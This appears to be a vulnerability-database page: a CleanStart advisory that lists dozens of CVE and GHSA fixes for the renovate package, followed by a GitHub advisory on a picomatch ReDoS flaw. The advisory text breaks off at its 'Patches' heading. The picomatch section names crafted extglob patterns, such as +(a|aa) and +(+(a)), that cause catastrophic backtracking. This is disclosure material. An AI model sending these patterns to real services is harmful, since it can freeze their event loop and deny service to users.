Vulnerability from cleanstart

Published

2026-05-18 13:17

Modified

2026-05-13 11:44

Summary

Security fixes for CVE-2025-64756, CVE-2025-69873, CVE-2026-1525, CVE-2026-1526, CVE-2026-1527, CVE-2026-1528, CVE-2026-2229, CVE-2026-2327, CVE-2026-23745, CVE-2026-2391, CVE-2026-24842, CVE-2026-25128, CVE-2026-25547, CVE-2026-2581, CVE-2026-25896, CVE-2026-26278, CVE-2026-26960, CVE-2026-27143, CVE-2026-27144, CVE-2026-27601, CVE-2026-27903, CVE-2026-27904, CVE-2026-27942, CVE-2026-28292, CVE-2026-2950, CVE-2026-29786, CVE-2026-31802, CVE-2026-32141, CVE-2026-32280, CVE-2026-32281, CVE-2026-32282, CVE-2026-32283, CVE-2026-32289, CVE-2026-33036, CVE-2026-33750, CVE-2026-33810, CVE-2026-35209, CVE-2026-42338, CVE-2026-4800, CVE-2026-6951, ghsa-23c5-xmqv-rm74, ghsa-25h7-pfq9-p65f, ghsa-2g4f-4pwh-qvx6, ghsa-2mjp-6q6p-2qxm, ghsa-34x7-hfp2-rc4v, ghsa-37qj-frw5-hhjh, ghsa-38c4-r59v-3vqw, ghsa-3ppc-4f35-3m26, ghsa-3v7f-55p6-f55p, ghsa-4992-7rv2-5pvq, ghsa-5j98-mcp5-4vw2, ghsa-737v-mqg7-c878, ghsa-73rr-hh4g-fpgx, ghsa-7h2j-956f-4vf2, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-8wc6-vgrq-x6cf, ghsa-9ppj-qmqm-q256, ghsa-c2c7-rcm5-vvqj, ghsa-f23m-r3pf-42rh, ghsa-f269-vfmq-vjvj, ghsa-f886-m6hf-6m8v, ghsa-fj3w-jwp8-x2g3, ghsa-hffm-xvc3-vprc, ghsa-jmr7-xgp7-cmfj, ghsa-m7jm-9gc2-mpf2, ghsa-phc3-fgpg-7m6h, ghsa-qffp-2rhf-9h96, ghsa-qpx9-hpmf-5gmw, ghsa-r275-fr43-pm7q, ghsa-r5fr-rjxr-66jc, ghsa-r6q2-hw4h-h46w, ghsa-v2v4-37r5-5v8g, ghsa-v3rj-xjv7-4jmq, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-w7fw-mjwx-w883, ghsa-xq3m-2v4x-88gg applied in versions: 43.123.6-r0, 43.123.8-r1, 43.123.8-r2, 43.123.8-r3, 43.4.4-r0

Details

Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.

References

URL

Type

	https://github.com/cleanstart-dev/cleanstart-secu…	ADVISORY
	https://osv.dev/vulnerability/CVE-2025-64756	WEB
	https://osv.dev/vulnerability/CVE-2025-69873	WEB
	https://osv.dev/vulnerability/CVE-2026-1525	WEB
	https://osv.dev/vulnerability/CVE-2026-1526	WEB
	https://osv.dev/vulnerability/CVE-2026-1527	WEB
	https://osv.dev/vulnerability/CVE-2026-1528	WEB
	https://osv.dev/vulnerability/CVE-2026-2229	WEB
	https://osv.dev/vulnerability/CVE-2026-2327	WEB
	https://osv.dev/vulnerability/CVE-2026-23745	WEB
	https://osv.dev/vulnerability/CVE-2026-2391	WEB
	https://osv.dev/vulnerability/CVE-2026-24842	WEB
	https://osv.dev/vulnerability/CVE-2026-25128	WEB
	https://osv.dev/vulnerability/CVE-2026-25547	WEB
	https://osv.dev/vulnerability/CVE-2026-2581	WEB
	https://osv.dev/vulnerability/CVE-2026-25896	WEB
	https://osv.dev/vulnerability/CVE-2026-26278	WEB
	https://osv.dev/vulnerability/CVE-2026-26960	WEB
	https://osv.dev/vulnerability/CVE-2026-27143	WEB
	https://osv.dev/vulnerability/CVE-2026-27144	WEB
	https://osv.dev/vulnerability/CVE-2026-27601	WEB
	https://osv.dev/vulnerability/CVE-2026-27903	WEB
	https://osv.dev/vulnerability/CVE-2026-27904	WEB
	https://osv.dev/vulnerability/CVE-2026-27942	WEB
	https://osv.dev/vulnerability/CVE-2026-28292	WEB
	https://osv.dev/vulnerability/CVE-2026-2950	WEB
	https://osv.dev/vulnerability/CVE-2026-29786	WEB
	https://osv.dev/vulnerability/CVE-2026-31802	WEB
	https://osv.dev/vulnerability/CVE-2026-32141	WEB
	https://osv.dev/vulnerability/CVE-2026-32280	WEB
	https://osv.dev/vulnerability/CVE-2026-32281	WEB
	https://osv.dev/vulnerability/CVE-2026-32282	WEB
	https://osv.dev/vulnerability/CVE-2026-32283	WEB
	https://osv.dev/vulnerability/CVE-2026-32289	WEB
	https://osv.dev/vulnerability/CVE-2026-33036	WEB
	https://osv.dev/vulnerability/CVE-2026-33750	WEB
	https://osv.dev/vulnerability/CVE-2026-33810	WEB
	https://osv.dev/vulnerability/CVE-2026-35209	WEB
	https://osv.dev/vulnerability/CVE-2026-42338	WEB
	https://osv.dev/vulnerability/CVE-2026-4800	WEB
	https://osv.dev/vulnerability/CVE-2026-6951	WEB
	https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74	WEB
	https://osv.dev/vulnerability/ghsa-25h7-pfq9-p65f	WEB
	https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6	WEB
	https://osv.dev/vulnerability/ghsa-2mjp-6q6p-2qxm	WEB
	https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v	WEB
	https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh	WEB
	https://osv.dev/vulnerability/ghsa-38c4-r59v-3vqw	WEB
	https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26	WEB
	https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p	WEB
	https://osv.dev/vulnerability/ghsa-4992-7rv2-5pvq	WEB
	https://osv.dev/vulnerability/ghsa-5j98-mcp5-4vw2	WEB
	https://osv.dev/vulnerability/ghsa-737v-mqg7-c878	WEB
	https://osv.dev/vulnerability/ghsa-73rr-hh4g-fpgx	WEB
	https://osv.dev/vulnerability/ghsa-7h2j-956f-4vf2	WEB
	https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj	WEB
	https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx	WEB
	https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r	WEB
	https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97	WEB
	https://osv.dev/vulnerability/ghsa-8wc6-vgrq-x6cf	WEB
	https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256	WEB
	https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj	WEB
	https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh	WEB
	https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj	WEB
	https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v	WEB
	https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3	WEB
	https://osv.dev/vulnerability/ghsa-hffm-xvc3-vprc	WEB
	https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj	WEB
	https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2	WEB
	https://osv.dev/vulnerability/ghsa-phc3-fgpg-7m6h	WEB
	https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96	WEB
	https://osv.dev/vulnerability/ghsa-qpx9-hpmf-5gmw	WEB
	https://osv.dev/vulnerability/ghsa-r275-fr43-pm7q	WEB
	https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc	WEB
	https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w	WEB
	https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g	WEB
	https://osv.dev/vulnerability/ghsa-v3rj-xjv7-4jmq	WEB
	https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8	WEB
	https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q	WEB
	https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883	WEB
	https://osv.dev/vulnerability/ghsa-xq3m-2v4x-88gg	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-64756	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-69873	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-1525	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-1526	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-1527	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-1528	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2229	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2327	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-23745	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2391	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-24842	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-25128	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-25547	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2581	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-25896	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-26278	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-26960	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-27143	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-27144	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-27601	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-27903	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-27904	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-27942	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-28292	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2950	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29786	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-31802	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32141	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32280	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32281	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32282	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32283	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32289	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33036	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33750	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33810	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-35209	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42338	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4800	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-6951	WEB

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "renovate"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "43.4.4-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-CE10526",
  "modified": "2026-05-13T11:44:57Z",
  "published": "2026-05-18T13:17:48.128214Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-CE10526.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-64756"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-1525"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-1526"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-1527"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-1528"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2229"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2327"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-23745"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2391"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-24842"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-25128"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-25547"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2581"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-25896"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-26278"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-26960"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-27143"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-27144"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-27601"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-27903"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-27904"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-27942"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-28292"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2950"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29786"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-31802"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32141"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32280"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32281"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32282"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32283"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32289"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33036"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33810"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-35209"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42338"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4800"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-6951"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-25h7-pfq9-p65f"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2mjp-6q6p-2qxm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-38c4-r59v-3vqw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-4992-7rv2-5pvq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5j98-mcp5-4vw2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-737v-mqg7-c878"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-73rr-hh4g-fpgx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-7h2j-956f-4vf2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-8wc6-vgrq-x6cf"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-hffm-xvc3-vprc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-phc3-fgpg-7m6h"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qpx9-hpmf-5gmw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r275-fr43-pm7q"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v3rj-xjv7-4jmq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xq3m-2v4x-88gg"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1527"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27143"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27144"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28292"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32283"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32289"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33810"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35209"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6951"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "summary": "Security fixes for CVE-2025-64756, CVE-2025-69873, CVE-2026-1525, CVE-2026-1526, CVE-2026-1527, CVE-2026-1528, CVE-2026-2229, CVE-2026-2327, CVE-2026-23745, CVE-2026-2391, CVE-2026-24842, CVE-2026-25128, CVE-2026-25547, CVE-2026-2581, CVE-2026-25896, CVE-2026-26278, CVE-2026-26960, CVE-2026-27143, CVE-2026-27144, CVE-2026-27601, CVE-2026-27903, CVE-2026-27904, CVE-2026-27942, CVE-2026-28292, CVE-2026-2950, CVE-2026-29786, CVE-2026-31802, CVE-2026-32141, CVE-2026-32280, CVE-2026-32281, CVE-2026-32282, CVE-2026-32283, CVE-2026-32289, CVE-2026-33036, CVE-2026-33750, CVE-2026-33810, CVE-2026-35209, CVE-2026-42338, CVE-2026-4800, CVE-2026-6951, ghsa-23c5-xmqv-rm74, ghsa-25h7-pfq9-p65f, ghsa-2g4f-4pwh-qvx6, ghsa-2mjp-6q6p-2qxm, ghsa-34x7-hfp2-rc4v, ghsa-37qj-frw5-hhjh, ghsa-38c4-r59v-3vqw, ghsa-3ppc-4f35-3m26, ghsa-3v7f-55p6-f55p, ghsa-4992-7rv2-5pvq, ghsa-5j98-mcp5-4vw2, ghsa-737v-mqg7-c878, ghsa-73rr-hh4g-fpgx, ghsa-7h2j-956f-4vf2, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-8wc6-vgrq-x6cf, ghsa-9ppj-qmqm-q256, ghsa-c2c7-rcm5-vvqj, ghsa-f23m-r3pf-42rh, ghsa-f269-vfmq-vjvj, ghsa-f886-m6hf-6m8v, ghsa-fj3w-jwp8-x2g3, ghsa-hffm-xvc3-vprc, ghsa-jmr7-xgp7-cmfj, ghsa-m7jm-9gc2-mpf2, ghsa-phc3-fgpg-7m6h, ghsa-qffp-2rhf-9h96, ghsa-qpx9-hpmf-5gmw, ghsa-r275-fr43-pm7q, ghsa-r5fr-rjxr-66jc, ghsa-r6q2-hw4h-h46w, ghsa-v2v4-37r5-5v8g, ghsa-v3rj-xjv7-4jmq, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-w7fw-mjwx-w883, ghsa-xq3m-2v4x-88gg applied in versions: 43.123.6-r0, 43.123.8-r1, 43.123.8-r2, 43.123.8-r3, 43.4.4-r0",
  "upstream": [
    "CVE-2025-64756",
    "CVE-2025-69873",
    "CVE-2026-1525",
    "CVE-2026-1526",
    "CVE-2026-1527",
    "CVE-2026-1528",
    "CVE-2026-2229",
    "CVE-2026-2327",
    "CVE-2026-23745",
    "CVE-2026-2391",
    "CVE-2026-24842",
    "CVE-2026-25128",
    "CVE-2026-25547",
    "CVE-2026-2581",
    "CVE-2026-25896",
    "CVE-2026-26278",
    "CVE-2026-26960",
    "CVE-2026-27143",
    "CVE-2026-27144",
    "CVE-2026-27601",
    "CVE-2026-27903",
    "CVE-2026-27904",
    "CVE-2026-27942",
    "CVE-2026-28292",
    "CVE-2026-2950",
    "CVE-2026-29786",
    "CVE-2026-31802",
    "CVE-2026-32141",
    "CVE-2026-32280",
    "CVE-2026-32281",
    "CVE-2026-32282",
    "CVE-2026-32283",
    "CVE-2026-32289",
    "CVE-2026-33036",
    "CVE-2026-33750",
    "CVE-2026-33810",
    "CVE-2026-35209",
    "CVE-2026-42338",
    "CVE-2026-4800",
    "CVE-2026-6951",
    "ghsa-23c5-xmqv-rm74",
    "ghsa-25h7-pfq9-p65f",
    "ghsa-2g4f-4pwh-qvx6",
    "ghsa-2mjp-6q6p-2qxm",
    "ghsa-34x7-hfp2-rc4v",
    "ghsa-37qj-frw5-hhjh",
    "ghsa-38c4-r59v-3vqw",
    "ghsa-3ppc-4f35-3m26",
    "ghsa-3v7f-55p6-f55p",
    "ghsa-4992-7rv2-5pvq",
    "ghsa-5j98-mcp5-4vw2",
    "ghsa-737v-mqg7-c878",
    "ghsa-73rr-hh4g-fpgx",
    "ghsa-7h2j-956f-4vf2",
    "ghsa-7r86-cg39-jmmj",
    "ghsa-83g3-92jg-28cx",
    "ghsa-8gc5-j5rx-235r",
    "ghsa-8qq5-rm4j-mr97",
    "ghsa-8wc6-vgrq-x6cf",
    "ghsa-9ppj-qmqm-q256",
    "ghsa-c2c7-rcm5-vvqj",
    "ghsa-f23m-r3pf-42rh",
    "ghsa-f269-vfmq-vjvj",
    "ghsa-f886-m6hf-6m8v",
    "ghsa-fj3w-jwp8-x2g3",
    "ghsa-hffm-xvc3-vprc",
    "ghsa-jmr7-xgp7-cmfj",
    "ghsa-m7jm-9gc2-mpf2",
    "ghsa-phc3-fgpg-7m6h",
    "ghsa-qffp-2rhf-9h96",
    "ghsa-qpx9-hpmf-5gmw",
    "ghsa-r275-fr43-pm7q",
    "ghsa-r5fr-rjxr-66jc",
    "ghsa-r6q2-hw4h-h46w",
    "ghsa-v2v4-37r5-5v8g",
    "ghsa-v3rj-xjv7-4jmq",
    "ghsa-v9p9-hfj2-hcw8",
    "ghsa-vrm6-8vpv-qv8q",
    "ghsa-w7fw-mjwx-w883",
    "ghsa-xq3m-2v4x-88gg"
  ]
}

GHSA-C2C7-RCM5-VVQJ

Vulnerability from github – Published: 2026-03-25 21:12 – Updated: 2026-03-27 21:36

Summary

Picomatch has a ReDoS vulnerability via extglob quantifiers

Details

Impact

picomatch is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as +() and *(), especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.

Examples of problematic patterns include +(a|aa), +(*|?), +(+(a)), *(+(a)), and +(+(+(a))). In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, +(a|aa) compiled to ^(?:(?=.)(?:a|aa)+)$ and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as +(+(a)) and *(+(a)) took around 29 seconds to reject a 33-character input on a modern M1 MacBook.

Applications are impacted when they allow untrusted users to supply glob patterns that are passed to picomatch for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.

Patches

